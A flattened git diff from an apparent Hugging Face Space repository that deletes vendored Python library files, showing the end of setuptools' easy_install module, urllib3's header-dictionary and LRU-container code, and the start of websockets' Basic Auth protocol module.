self.paths.remove(dist.location) - self.dirty = True - Environment.remove(self, dist) - - def make_relative(self, path): - npath, last = os.path.split(normalize_path(path)) - baselen = len(self.basedir) - parts = [last] - sep = os.altsep == '/' and '/' or os.sep - while len(npath) >= baselen: - if npath == self.basedir: - parts.append(os.curdir) - parts.reverse() - return sep.join(parts) - npath, last = os.path.split(npath) - parts.append(last) - else: - return path - - -class RewritePthDistributions(PthDistributions): - @classmethod - def _wrap_lines(cls, lines): - yield cls.prelude - for line in lines: - yield line - yield cls.postlude - - prelude = _one_liner(""" - import sys - sys.__plen = len(sys.path) - """) - postlude = _one_liner(""" - import sys - new = sys.path[sys.__plen:] - del sys.path[sys.__plen:] - p = getattr(sys, '__egginsert', 0) - sys.path[p:p] = new - sys.__egginsert = p + len(new) - """) - - -if os.environ.get('SETUPTOOLS_SYS_PATH_TECHNIQUE', 'raw') == 'rewrite': - PthDistributions = RewritePthDistributions - - -def _first_line_re(): - """ - Return a regular expression based on first_line_re suitable for matching - strings. - """ - if isinstance(first_line_re.pattern, str): - return first_line_re - - # first_line_re in Python >=3.1.4 and >=3.2.1 is a bytes pattern. - return re.compile(first_line_re.pattern.decode()) - - -def auto_chmod(func, arg, exc): - if func in [os.unlink, os.remove] and os.name == 'nt': - chmod(arg, stat.S_IWRITE) - return func(arg) - et, ev, _ = sys.exc_info() - # TODO: This code doesn't make sense. What is it trying to do? - raise (ev[0], ev[1] + (" %s %s" % (func, arg))) - - -def update_dist_caches(dist_path, fix_zipimporter_caches): - """ - Fix any globally cached `dist_path` related data - - `dist_path` should be a path of a newly installed egg distribution (zipped - or unzipped). - - sys.path_importer_cache contains finder objects that have been cached when - importing data from the original distribution. Any such finders need to be - cleared since the replacement distribution might be packaged differently, - e.g. a zipped egg distribution might get replaced with an unzipped egg - folder or vice versa. Having the old finders cached may then cause Python - to attempt loading modules from the replacement distribution using an - incorrect loader. - - zipimport.zipimporter objects are Python loaders charged with importing - data packaged inside zip archives. If stale loaders referencing the - original distribution, are left behind, they can fail to load modules from - the replacement distribution. E.g. if an old zipimport.zipimporter instance - is used to load data from a new zipped egg archive, it may cause the - operation to attempt to locate the requested data in the wrong location - - one indicated by the original distribution's zip archive directory - information. Such an operation may then fail outright, e.g. report having - read a 'bad local file header', or even worse, it may fail silently & - return invalid data. - - zipimport._zip_directory_cache contains cached zip archive directory - information for all existing zipimport.zipimporter instances and all such - instances connected to the same archive share the same cached directory - information. - - If asked, and the underlying Python implementation allows it, we can fix - all existing zipimport.zipimporter instances instead of having to track - them down and remove them one by one, by updating their shared cached zip - archive directory information. This, of course, assumes that the - replacement distribution is packaged as a zipped egg. - - If not asked to fix existing zipimport.zipimporter instances, we still do - our best to clear any remaining zipimport.zipimporter related cached data - that might somehow later get used when attempting to load data from the new - distribution and thus cause such load operations to fail. Note that when - tracking down such remaining stale data, we can not catch every conceivable - usage from here, and we clear only those that we know of and have found to - cause problems if left alive. Any remaining caches should be updated by - whomever is in charge of maintaining them, i.e. they should be ready to - handle us replacing their zip archives with new distributions at runtime. - - """ - # There are several other known sources of stale zipimport.zipimporter - # instances that we do not clear here, but might if ever given a reason to - # do so: - # * Global setuptools pkg_resources.working_set (a.k.a. 'master working - # set') may contain distributions which may in turn contain their - # zipimport.zipimporter loaders. - # * Several zipimport.zipimporter loaders held by local variables further - # up the function call stack when running the setuptools installation. - # * Already loaded modules may have their __loader__ attribute set to the - # exact loader instance used when importing them. Python 3.4 docs state - # that this information is intended mostly for introspection and so is - # not expected to cause us problems. - normalized_path = normalize_path(dist_path) - _uncache(normalized_path, sys.path_importer_cache) - if fix_zipimporter_caches: - _replace_zip_directory_cache_data(normalized_path) - else: - # Here, even though we do not want to fix existing and now stale - # zipimporter cache information, we still want to remove it. Related to - # Python's zip archive directory information cache, we clear each of - # its stale entries in two phases: - # 1. Clear the entry so attempting to access zip archive information - # via any existing stale zipimport.zipimporter instances fails. - # 2. Remove the entry from the cache so any newly constructed - # zipimport.zipimporter instances do not end up using old stale - # zip archive directory information. - # This whole stale data removal step does not seem strictly necessary, - # but has been left in because it was done before we started replacing - # the zip archive directory information cache content if possible, and - # there are no relevant unit tests that we can depend on to tell us if - # this is really needed. - _remove_and_clear_zip_directory_cache_data(normalized_path) - - -def _collect_zipimporter_cache_entries(normalized_path, cache): - """ - Return zipimporter cache entry keys related to a given normalized path. - - Alternative path spellings (e.g. those using different character case or - those using alternative path separators) related to the same path are - included. Any sub-path entries are included as well, i.e. those - corresponding to zip archives embedded in other zip archives. - - """ - result = [] - prefix_len = len(normalized_path) - for p in cache: - np = normalize_path(p) - if (np.startswith(normalized_path) and - np[prefix_len:prefix_len + 1] in (os.sep, '')): - result.append(p) - return result - - -def _update_zipimporter_cache(normalized_path, cache, updater=None): - """ - Update zipimporter cache data for a given normalized path. - - Any sub-path entries are processed as well, i.e. those corresponding to zip - archives embedded in other zip archives. - - Given updater is a callable taking a cache entry key and the original entry - (after already removing the entry from the cache), and expected to update - the entry and possibly return a new one to be inserted in its place. - Returning None indicates that the entry should not be replaced with a new - one. If no updater is given, the cache entries are simply removed without - any additional processing, the same as if the updater simply returned None. - - """ - for p in _collect_zipimporter_cache_entries(normalized_path, cache): - # N.B. pypy's custom zipimport._zip_directory_cache implementation does - # not support the complete dict interface: - # * Does not support item assignment, thus not allowing this function - # to be used only for removing existing cache entries. - # * Does not support the dict.pop() method, forcing us to use the - # get/del patterns instead. For more detailed information see the - # following links: - # https://github.com/pypa/setuptools/issues/202#issuecomment-202913420 - # http://bit.ly/2h9itJX - old_entry = cache[p] - del cache[p] - new_entry = updater and updater(p, old_entry) - if new_entry is not None: - cache[p] = new_entry - - -def _uncache(normalized_path, cache): - _update_zipimporter_cache(normalized_path, cache) - - -def _remove_and_clear_zip_directory_cache_data(normalized_path): - def clear_and_remove_cached_zip_archive_directory_data(path, old_entry): - old_entry.clear() - - _update_zipimporter_cache( - normalized_path, zipimport._zip_directory_cache, - updater=clear_and_remove_cached_zip_archive_directory_data) - - -# PyPy Python implementation does not allow directly writing to the -# zipimport._zip_directory_cache and so prevents us from attempting to correct -# its content. The best we can do there is clear the problematic cache content -# and have PyPy repopulate it as needed. The downside is that if there are any -# stale zipimport.zipimporter instances laying around, attempting to use them -# will fail due to not having its zip archive directory information available -# instead of being automatically corrected to use the new correct zip archive -# directory information. -if '__pypy__' in sys.builtin_module_names: - _replace_zip_directory_cache_data = \ - _remove_and_clear_zip_directory_cache_data -else: - - def _replace_zip_directory_cache_data(normalized_path): - def replace_cached_zip_archive_directory_data(path, old_entry): - # N.B. In theory, we could load the zip directory information just - # once for all updated path spellings, and then copy it locally and - # update its contained path strings to contain the correct - # spelling, but that seems like a way too invasive move (this cache - # structure is not officially documented anywhere and could in - # theory change with new Python releases) for no significant - # benefit. - old_entry.clear() - zipimport.zipimporter(path) - old_entry.update(zipimport._zip_directory_cache[path]) - return old_entry - - _update_zipimporter_cache( - normalized_path, zipimport._zip_directory_cache, - updater=replace_cached_zip_archive_directory_data) - - -def is_python(text, filename=''): - "Is this string a valid Python script?" - try: - compile(text, filename, 'exec') - except (SyntaxError, TypeError): - return False - else: - return True - - -def is_sh(executable): - """Determine if the specified executable is a .sh (contains a #! line)""" - try: - with io.open(executable, encoding='latin-1') as fp: - magic = fp.read(2) - except (OSError, IOError): - return executable - return magic == '#!' - - -def nt_quote_arg(arg): - """Quote a command line argument according to Windows parsing rules""" - return subprocess.list2cmdline([arg]) - - -def is_python_script(script_text, filename): - """Is this text, as a whole, a Python script? (as opposed to shell/bat/etc. - """ - if filename.endswith('.py') or filename.endswith('.pyw'): - return True # extension says it's Python - if is_python(script_text, filename): - return True # it's syntactically valid Python - if script_text.startswith('#!'): - # It begins with a '#!' line, so check if 'python' is in it somewhere - return 'python' in script_text.splitlines()[0].lower() - - return False # Not any Python I can recognize - - -try: - from os import chmod as _chmod -except ImportError: - # Jython compatibility - def _chmod(*args): - pass - - -def chmod(path, mode): - log.debug("changing mode of %s to %o", path, mode) - try: - _chmod(path, mode) - except os.error as e: - log.debug("chmod failed: %s", e) - - -class CommandSpec(list): - """ - A command spec for a #! header, specified as a list of arguments akin to - those passed to Popen. - """ - - options = [] - split_args = dict() - - @classmethod - def best(cls): - """ - Choose the best CommandSpec class based on environmental conditions. - """ - return cls - - @classmethod - def _sys_executable(cls): - _default = os.path.normpath(sys.executable) - return os.environ.get('__PYVENV_LAUNCHER__', _default) - - @classmethod - def from_param(cls, param): - """ - Construct a CommandSpec from a parameter to build_scripts, which may - be None. - """ - if isinstance(param, cls): - return param - if isinstance(param, list): - return cls(param) - if param is None: - return cls.from_environment() - # otherwise, assume it's a string. - return cls.from_string(param) - - @classmethod - def from_environment(cls): - return cls([cls._sys_executable()]) - - @classmethod - def from_string(cls, string): - """ - Construct a command spec from a simple string representing a command - line parseable by shlex.split. - """ - items = shlex.split(string, **cls.split_args) - return cls(items) - - def install_options(self, script_text): - self.options = shlex.split(self._extract_options(script_text)) - cmdline = subprocess.list2cmdline(self) - if not isascii(cmdline): - self.options[:0] = ['-x'] - - @staticmethod - def _extract_options(orig_script): - """ - Extract any options from the first line of the script. - """ - first = (orig_script + '\n').splitlines()[0] - match = _first_line_re().match(first) - options = match.group(1) or '' if match else '' - return options.strip() - - def as_header(self): - return self._render(self + list(self.options)) - - @staticmethod - def _strip_quotes(item): - _QUOTES = '"\'' - for q in _QUOTES: - if item.startswith(q) and item.endswith(q): - return item[1:-1] - return item - - @staticmethod - def _render(items): - cmdline = subprocess.list2cmdline( - CommandSpec._strip_quotes(item.strip()) for item in items) - return '#!' + cmdline + '\n' - - -# For pbr compat; will be removed in a future version. -sys_executable = CommandSpec._sys_executable() - - -class WindowsCommandSpec(CommandSpec): - split_args = dict(posix=False) - - -class ScriptWriter: - """ - Encapsulates behavior around writing entry point scripts for console and - gui apps. - """ - - template = textwrap.dedent(r""" - # EASY-INSTALL-ENTRY-SCRIPT: %(spec)r,%(group)r,%(name)r - import re - import sys - - # for compatibility with easy_install; see #2198 - __requires__ = %(spec)r - - try: - from importlib.metadata import distribution - except ImportError: - try: - from importlib_metadata import distribution - except ImportError: - from pkg_resources import load_entry_point - - - def importlib_load_entry_point(spec, group, name): - dist_name, _, _ = spec.partition('==') - matches = ( - entry_point - for entry_point in distribution(dist_name).entry_points - if entry_point.group == group and entry_point.name == name - ) - return next(matches).load() - - - globals().setdefault('load_entry_point', importlib_load_entry_point) - - - if __name__ == '__main__': - sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) - sys.exit(load_entry_point(%(spec)r, %(group)r, %(name)r)()) - """).lstrip() - - command_spec_class = CommandSpec - - @classmethod - def get_script_args(cls, dist, executable=None, wininst=False): - # for backward compatibility - warnings.warn("Use get_args", EasyInstallDeprecationWarning) - writer = (WindowsScriptWriter if wininst else ScriptWriter).best() - header = cls.get_script_header("", executable, wininst) - return writer.get_args(dist, header) - - @classmethod - def get_script_header(cls, script_text, executable=None, wininst=False): - # for backward compatibility - warnings.warn( - "Use get_header", EasyInstallDeprecationWarning, stacklevel=2) - if wininst: - executable = "python.exe" - return cls.get_header(script_text, executable) - - @classmethod - def get_args(cls, dist, header=None): - """ - Yield write_script() argument tuples for a distribution's - console_scripts and gui_scripts entry points. - """ - if header is None: - header = cls.get_header() - spec = str(dist.as_requirement()) - for type_ in 'console', 'gui': - group = type_ + '_scripts' - for name, ep in dist.get_entry_map(group).items(): - cls._ensure_safe_name(name) - script_text = cls.template % locals() - args = cls._get_script_args(type_, name, header, script_text) - for res in args: - yield res - - @staticmethod - def _ensure_safe_name(name): - """ - Prevent paths in *_scripts entry point names. - """ - has_path_sep = re.search(r'[\\/]', name) - if has_path_sep: - raise ValueError("Path separators not allowed in script names") - - @classmethod - def get_writer(cls, force_windows): - # for backward compatibility - warnings.warn("Use best", EasyInstallDeprecationWarning) - return WindowsScriptWriter.best() if force_windows else cls.best() - - @classmethod - def best(cls): - """ - Select the best ScriptWriter for this environment. - """ - if sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt'): - return WindowsScriptWriter.best() - else: - return cls - - @classmethod - def _get_script_args(cls, type_, name, header, script_text): - # Simply write the stub with no extension. - yield (name, header + script_text) - - @classmethod - def get_header(cls, script_text="", executable=None): - """Create a #! line, getting options (if any) from script_text""" - cmd = cls.command_spec_class.best().from_param(executable) - cmd.install_options(script_text) - return cmd.as_header() - - -class WindowsScriptWriter(ScriptWriter): - command_spec_class = WindowsCommandSpec - - @classmethod - def get_writer(cls): - # for backward compatibility - warnings.warn("Use best", EasyInstallDeprecationWarning) - return cls.best() - - @classmethod - def best(cls): - """ - Select the best ScriptWriter suitable for Windows - """ - writer_lookup = dict( - executable=WindowsExecutableLauncherWriter, - natural=cls, - ) - # for compatibility, use the executable launcher by default - launcher = os.environ.get('SETUPTOOLS_LAUNCHER', 'executable') - return writer_lookup[launcher] - - @classmethod - def _get_script_args(cls, type_, name, header, script_text): - "For Windows, add a .py extension" - ext = dict(console='.pya', gui='.pyw')[type_] - if ext not in os.environ['PATHEXT'].lower().split(';'): - msg = ( - "{ext} not listed in PATHEXT; scripts will not be " - "recognized as executables." - ).format(**locals()) - warnings.warn(msg, UserWarning) - old = ['.pya', '.py', '-script.py', '.pyc', '.pyo', '.pyw', '.exe'] - old.remove(ext) - header = cls._adjust_header(type_, header) - blockers = [name + x for x in old] - yield name + ext, header + script_text, 't', blockers - - @classmethod - def _adjust_header(cls, type_, orig_header): - """ - Make sure 'pythonw' is used for gui and 'python' is used for - console (regardless of what sys.executable is). - """ - pattern = 'pythonw.exe' - repl = 'python.exe' - if type_ == 'gui': - pattern, repl = repl, pattern - pattern_ob = re.compile(re.escape(pattern), re.IGNORECASE) - new_header = pattern_ob.sub(string=orig_header, repl=repl) - return new_header if cls._use_header(new_header) else orig_header - - @staticmethod - def _use_header(new_header): - """ - Should _adjust_header use the replaced header? - - On non-windows systems, always use. On - Windows systems, only use the replaced header if it resolves - to an executable on the system. - """ - clean_header = new_header[2:-1].strip('"') - return sys.platform != 'win32' or find_executable(clean_header) - - -class WindowsExecutableLauncherWriter(WindowsScriptWriter): - @classmethod - def _get_script_args(cls, type_, name, header, script_text): - """ - For Windows, add a .py extension and an .exe launcher - """ - if type_ == 'gui': - launcher_type = 'gui' - ext = '-script.pyw' - old = ['.pyw'] - else: - launcher_type = 'cli' - ext = '-script.py' - old = ['.py', '.pyc', '.pyo'] - hdr = cls._adjust_header(type_, header) - blockers = [name + x for x in old] - yield (name + ext, hdr + script_text, 't', blockers) - yield ( - name + '.exe', get_win_launcher(launcher_type), - 'b' # write in binary mode - ) - if not is_64bit(): - # install a manifest for the launcher to prevent Windows - # from detecting it as an installer (which it will for - # launchers like easy_install.exe). Consider only - # adding a manifest for launchers detected as installers. - # See Distribute #143 for details. - m_name = name + '.exe.manifest' - yield (m_name, load_launcher_manifest(name), 't') - - -# for backward-compatibility -get_script_args = ScriptWriter.get_script_args -get_script_header = ScriptWriter.get_script_header - - -def get_win_launcher(type): - """ - Load the Windows launcher (executable) suitable for launching a script. - - `type` should be either 'cli' or 'gui' - - Returns the executable as a byte string. - """ - launcher_fn = '%s.exe' % type - if is_64bit(): - launcher_fn = launcher_fn.replace(".", "-64.") - else: - launcher_fn = launcher_fn.replace(".", "-32.") - return resource_string('setuptools', launcher_fn) - - -def load_launcher_manifest(name): - manifest = pkg_resources.resource_string(__name__, 'launcher manifest.xml') - return manifest.decode('utf-8') % vars() - - -def rmtree(path, ignore_errors=False, onerror=auto_chmod): - return shutil.rmtree(path, ignore_errors, onerror) - - -def current_umask(): - tmp = os.umask(0o022) - os.umask(tmp) - return tmp - - -class EasyInstallDeprecationWarning(SetuptoolsDeprecationWarning): - """ - Warning for EasyInstall deprecations, bypassing suppression. - """ diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/urllib3/_collections.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/urllib3/_collections.py deleted file mode 100644 index 8bdfb767e6632d51b94145baea17b62306c34d53..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/urllib3/_collections.py +++ /dev/null @@ -1,481 +0,0 @@ -from __future__ import annotations - -import typing -from collections import OrderedDict -from enum import Enum, auto -from threading import RLock - -if typing.TYPE_CHECKING: - # We can only import Protocol if TYPE_CHECKING because it's a development - # dependency, and is not available at runtime. - from typing_extensions import Protocol, Self - - class HasGettableStringKeys(Protocol): - def keys(self) -> typing.Iterator[str]: - ... - - def __getitem__(self, key: str) -> str: - ... - - -__all__ = ["RecentlyUsedContainer", "HTTPHeaderDict"] - - -# Key type -_KT = typing.TypeVar("_KT") -# Value type -_VT = typing.TypeVar("_VT") -# Default type -_DT = typing.TypeVar("_DT") - -ValidHTTPHeaderSource = typing.Union[ - "HTTPHeaderDict", - typing.Mapping[str, str], - typing.Iterable[typing.Tuple[str, str]], - "HasGettableStringKeys", -] - - -class _Sentinel(Enum): - not_passed = auto() - - -def ensure_can_construct_http_header_dict( - potential: object, -) -> ValidHTTPHeaderSource | None: - if isinstance(potential, HTTPHeaderDict): - return potential - elif isinstance(potential, typing.Mapping): - # Full runtime checking of the contents of a Mapping is expensive, so for the - # purposes of typechecking, we assume that any Mapping is the right shape. - return typing.cast(typing.Mapping[str, str], potential) - elif isinstance(potential, typing.Iterable): - # Similarly to Mapping, full runtime checking of the contents of an Iterable is - # expensive, so for the purposes of typechecking, we assume that any Iterable - # is the right shape. - return typing.cast(typing.Iterable[typing.Tuple[str, str]], potential) - elif hasattr(potential, "keys") and hasattr(potential, "__getitem__"): - return typing.cast("HasGettableStringKeys", potential) - else: - return None - - -class RecentlyUsedContainer(typing.Generic[_KT, _VT], typing.MutableMapping[_KT, _VT]): - """ - Provides a thread-safe dict-like container which maintains up to - ``maxsize`` keys while throwing away the least-recently-used keys beyond - ``maxsize``. - - :param maxsize: - Maximum number of recent elements to retain. - - :param dispose_func: - Every time an item is evicted from the container, - ``dispose_func(value)`` is called. Callback which will get called - """ - - _container: typing.OrderedDict[_KT, _VT] - _maxsize: int - dispose_func: typing.Callable[[_VT], None] | None - lock: RLock - - def __init__( - self, - maxsize: int = 10, - dispose_func: typing.Callable[[_VT], None] | None = None, - ) -> None: - super().__init__() - self._maxsize = maxsize - self.dispose_func = dispose_func - self._container = OrderedDict() - self.lock = RLock() - - def __getitem__(self, key: _KT) -> _VT: - # Re-insert the item, moving it to the end of the eviction line. - with self.lock: - item = self._container.pop(key) - self._container[key] = item - return item - - def __setitem__(self, key: _KT, value: _VT) -> None: - evicted_item = None - with self.lock: - # Possibly evict the existing value of 'key' - try: - # If the key exists, we'll overwrite it, which won't change the - # size of the pool. Because accessing a key should move it to - # the end of the eviction line, we pop it out first. - evicted_item = key, self._container.pop(key) - self._container[key] = value - except KeyError: - # When the key does not exist, we insert the value first so that - # evicting works in all cases, including when self._maxsize is 0 - self._container[key] = value - if len(self._container) > self._maxsize: - # If we didn't evict an existing value, and we've hit our maximum - # size, then we have to evict the least recently used item from - # the beginning of the container. - evicted_item = self._container.popitem(last=False) - - # After releasing the lock on the pool, dispose of any evicted value. - if evicted_item is not None and self.dispose_func: - _, evicted_value = evicted_item - self.dispose_func(evicted_value) - - def __delitem__(self, key: _KT) -> None: - with self.lock: - value = self._container.pop(key) - - if self.dispose_func: - self.dispose_func(value) - - def __len__(self) -> int: - with self.lock: - return len(self._container) - - def __iter__(self) -> typing.NoReturn: - raise NotImplementedError( - "Iteration over this class is unlikely to be threadsafe." - ) - - def clear(self) -> None: - with self.lock: - # Copy pointers to all values, then wipe the mapping - values = list(self._container.values()) - self._container.clear() - - if self.dispose_func: - for value in values: - self.dispose_func(value) - - def keys(self) -> set[_KT]: # type: ignore[override] - with self.lock: - return set(self._container.keys()) - - -class HTTPHeaderDictItemView(typing.Set[typing.Tuple[str, str]]): - """ - HTTPHeaderDict is unusual for a Mapping[str, str] in that it has two modes of - address. - - If we directly try to get an item with a particular name, we will get a string - back that is the concatenated version of all the values: - - >>> d['X-Header-Name'] - 'Value1, Value2, Value3' - - However, if we iterate over an HTTPHeaderDict's items, we will optionally combine - these values based on whether combine=True was called when building up the dictionary - - >>> d = HTTPHeaderDict({"A": "1", "B": "foo"}) - >>> d.add("A", "2", combine=True) - >>> d.add("B", "bar") - >>> list(d.items()) - [ - ('A', '1, 2'), - ('B', 'foo'), - ('B', 'bar'), - ] - - This class conforms to the interface required by the MutableMapping ABC while - also giving us the nonstandard iteration behavior we want; items with duplicate - keys, ordered by time of first insertion. - """ - - _headers: HTTPHeaderDict - - def __init__(self, headers: HTTPHeaderDict) -> None: - self._headers = headers - - def __len__(self) -> int: - return len(list(self._headers.iteritems())) - - def __iter__(self) -> typing.Iterator[tuple[str, str]]: - return self._headers.iteritems() - - def __contains__(self, item: object) -> bool: - if isinstance(item, tuple) and len(item) == 2: - passed_key, passed_val = item - if isinstance(passed_key, str) and isinstance(passed_val, str): - return self._headers._has_value_for_header(passed_key, passed_val) - return False - - -class HTTPHeaderDict(typing.MutableMapping[str, str]): - """ - :param headers: - An iterable of field-value pairs. Must not contain multiple field names - when compared case-insensitively. - - :param kwargs: - Additional field-value pairs to pass in to ``dict.update``. - - A ``dict`` like container for storing HTTP Headers. - - Field names are stored and compared case-insensitively in compliance with - RFC 7230. Iteration provides the first case-sensitive key seen for each - case-insensitive pair. - - Using ``__setitem__`` syntax overwrites fields that compare equal - case-insensitively in order to maintain ``dict``'s api. For fields that - compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add`` - in a loop. - - If multiple fields that are equal case-insensitively are passed to the - constructor or ``.update``, the behavior is undefined and some will be - lost. - - >>> headers = HTTPHeaderDict() - >>> headers.add('Set-Cookie', 'foo=bar') - >>> headers.add('set-cookie', 'baz=quxx') - >>> headers['content-length'] = '7' - >>> headers['SET-cookie'] - 'foo=bar, baz=quxx' - >>> headers['Content-Length'] - '7' - """ - - _container: typing.MutableMapping[str, list[str]] - - def __init__(self, headers: ValidHTTPHeaderSource | None = None, **kwargs: str): - super().__init__() - self._container = {} # 'dict' is insert-ordered in Python 3.7+ - if headers is not None: - if isinstance(headers, HTTPHeaderDict): - self._copy_from(headers) - else: - self.extend(headers) - if kwargs: - self.extend(kwargs) - - def __setitem__(self, key: str, val: str) -> None: - # avoid a bytes/str comparison by decoding before httplib - if isinstance(key, bytes): - key = key.decode("latin-1") - self._container[key.lower()] = [key, val] - - def __getitem__(self, key: str) -> str: - val = self._container[key.lower()] - return ", ".join(val[1:]) - - def __delitem__(self, key: str) -> None: - del self._container[key.lower()] - - def __contains__(self, key: object) -> bool: - if isinstance(key, str): - return key.lower() in self._container - return False - - def setdefault(self, key: str, default: str = "") -> str: - return super().setdefault(key, default) - - def __eq__(self, other: object) -> bool: - maybe_constructable = ensure_can_construct_http_header_dict(other) - if maybe_constructable is None: - return False - else: - other_as_http_header_dict = type(self)(maybe_constructable) - - return {k.lower(): v for k, v in self.itermerged()} == { - k.lower(): v for k, v in other_as_http_header_dict.itermerged() - } - - def __ne__(self, other: object) -> bool: - return not self.__eq__(other) - - def __len__(self) -> int: - return len(self._container) - - def __iter__(self) -> typing.Iterator[str]: - # Only provide the originally cased names - for vals in self._container.values(): - yield vals[0] - - def discard(self, key: str) -> None: - try: - del self[key] - except KeyError: - pass - - def add(self, key: str, val: str, *, combine: bool = False) -> None: - """Adds a (name, value) pair, doesn't overwrite the value if it already - exists. - - If this is called with combine=True, instead of adding a new header value - as a distinct item during iteration, this will instead append the value to - any existing header value with a comma. If no existing header value exists - for the key, then the value will simply be added, ignoring the combine parameter. - - >>> headers = HTTPHeaderDict(foo='bar') - >>> headers.add('Foo', 'baz') - >>> headers['foo'] - 'bar, baz' - >>> list(headers.items()) - [('foo', 'bar'), ('foo', 'baz')] - >>> headers.add('foo', 'quz', combine=True) - >>> list(headers.items()) - [('foo', 'bar, baz, quz')] - """ - # avoid a bytes/str comparison by decoding before httplib - if isinstance(key, bytes): - key = key.decode("latin-1") - key_lower = key.lower() - new_vals = [key, val] - # Keep the common case aka no item present as fast as possible - vals = self._container.setdefault(key_lower, new_vals) - if new_vals is not vals: - # if there are values here, then there is at least the initial - # key/value pair - assert len(vals) >= 2 - if combine: - vals[-1] = vals[-1] + ", " + val - else: - vals.append(val) - - def extend(self, *args: ValidHTTPHeaderSource, **kwargs: str) -> None: - """Generic import function for any type of header-like object. - Adapted version of MutableMapping.update in order to insert items - with self.add instead of self.__setitem__ - """ - if len(args) > 1: - raise TypeError( - f"extend() takes at most 1 positional arguments ({len(args)} given)" - ) - other = args[0] if len(args) >= 1 else () - - if isinstance(other, HTTPHeaderDict): - for key, val in other.iteritems(): - self.add(key, val) - elif isinstance(other, typing.Mapping): - for key, val in other.items(): - self.add(key, val) - elif isinstance(other, typing.Iterable): - other = typing.cast(typing.Iterable[typing.Tuple[str, str]], other) - for key, value in other: - self.add(key, value) - elif hasattr(other, "keys") and hasattr(other, "__getitem__"): - # THIS IS NOT A TYPESAFE BRANCH - # In this branch, the object has a `keys` attr but is not a Mapping or any of - # the other types indicated in the method signature. We do some stuff with - # it as though it partially implements the Mapping interface, but we're not - # doing that stuff safely AT ALL. - for key in other.keys(): - self.add(key, other[key]) - - for key, value in kwargs.items(): - self.add(key, value) - - @typing.overload - def getlist(self, key: str) -> list[str]: - ... - - @typing.overload - def getlist(self, key: str, default: _DT) -> list[str] | _DT: - ... - - def getlist( - self, key: str, default: _Sentinel | _DT = _Sentinel.not_passed - ) -> list[str] | _DT: - """Returns a list of all the values for the named field. Returns an - empty list if the key doesn't exist.""" - try: - vals = self._container[key.lower()] - except KeyError: - if default is _Sentinel.not_passed: - # _DT is unbound; empty list is instance of List[str] - return [] - # _DT is bound; default is instance of _DT - return default - else: - # _DT may or may not be bound; vals[1:] is instance of List[str], which - # meets our external interface requirement of `Union[List[str], _DT]`. - return vals[1:] - - def _prepare_for_method_change(self) -> Self: - """ - Remove content-specific header fields before changing the request - method to GET or HEAD according to RFC 9110, Section 15.4. - """ - content_specific_headers = [ - "Content-Encoding", - "Content-Language", - "Content-Location", - "Content-Type", - "Content-Length", - "Digest", - "Last-Modified", - ] - for header in content_specific_headers: - self.discard(header) - return self - - # Backwards compatibility for httplib - getheaders = getlist - getallmatchingheaders = getlist - iget = getlist - - # Backwards compatibility for http.cookiejar - get_all = getlist - - def __repr__(self) -> str: - return f"{type(self).__name__}({dict(self.itermerged())})" - - def _copy_from(self, other: HTTPHeaderDict) -> None: - for key in other: - val = other.getlist(key) - self._container[key.lower()] = [key, *val] - - def copy(self) -> HTTPHeaderDict: - clone = type(self)() - clone._copy_from(self) - return clone - - def iteritems(self) -> typing.Iterator[tuple[str, str]]: - """Iterate over all header lines, including duplicate ones.""" - for key in self: - vals = self._container[key.lower()] - for val in vals[1:]: - yield vals[0], val - - def itermerged(self) -> typing.Iterator[tuple[str, str]]: - """Iterate over all headers, merging duplicate ones together.""" - for key in self: - val = self._container[key.lower()] - yield val[0], ", ".join(val[1:]) - - def items(self) -> HTTPHeaderDictItemView: # type: ignore[override] - return HTTPHeaderDictItemView(self) - - def _has_value_for_header(self, header_name: str, potential_value: str) -> bool: - if header_name in self: - return potential_value in self._container[header_name.lower()][1:] - return False - - def __ior__(self, other: object) -> HTTPHeaderDict: - # Supports extending a header dict in-place using operator |= - # combining items with add instead of __setitem__ - maybe_constructable = ensure_can_construct_http_header_dict(other) - if maybe_constructable is None: - return NotImplemented - self.extend(maybe_constructable) - return self - - def __or__(self, other: object) -> HTTPHeaderDict: - # Supports merging header dicts using operator | - # combining items with add instead of __setitem__ - maybe_constructable = ensure_can_construct_http_header_dict(other) - if maybe_constructable is None: - return NotImplemented - result = self.copy() - result.extend(maybe_constructable) - return result - - def __ror__(self, other: object) -> HTTPHeaderDict: - # Supports merging header dicts using operator | when other is on left side - # combining items with add instead of __setitem__ - maybe_constructable = ensure_can_construct_http_header_dict(other) - if maybe_constructable is None: - return NotImplemented - result = type(self)(maybe_constructable) - result.extend(self) - return result diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/websockets/legacy/auth.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/websockets/legacy/auth.py deleted file mode 100644 index d3425836e18b21b0daefc62793a90e97e1e1a6a8..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/websockets/legacy/auth.py +++ /dev/null @@ -1,184 +0,0 @@ -from __future__ import annotations - -import functools -import hmac -import http -from typing import Any, Awaitable, Callable, Iterable, Optional, Tuple, Union, cast - -from ..datastructures import Headers -from ..exceptions import InvalidHeader -from ..headers import build_www_authenticate_basic, parse_authorization_basic -from .server import HTTPResponse, WebSocketServerProtocol - - -__all__ = ["BasicAuthWebSocketServerProtocol", "basic_auth_protocol_factory"] - -Credentials = Tuple[str, str] - - -def is_credentials(value: Any) -> bool: - try: - username, password = value - except (TypeError, ValueError): - return False - else: - return isinstance(username, str) and isinstance(password, str) - - -class BasicAuthWebSocketServerProtocol(WebSocketServerProtocol): - """ - WebSocket server protocol that enforces HTTP Basic Auth. - - """ - - realm: str = "" - """ - Scope of protection. - - If provided, it should contain only ASCII characters because the - encoding of non-ASCII characters is undefined. - """ - - username: Optional[str] = None - """Username of the authenticated user.""" - - def __init__( - self, - *args: Any, - realm: Optional[str] = None, - check_credentials: Optional[Callable[[str, str], Awaitable[bool]]] = None, - **kwargs: Any, - ) -> None: - if realm is not None: - self.realm = realm # shadow class attribute - self._check_credentials = check_credentials - super().__init__(*args, **kwargs) - - async def check_credentials(self, username: str, password: str) -> bool: - """ - Check whether credentials are authorized. - - This coroutine may be overridden in a subclass, for example to - authenticate against a database or an external 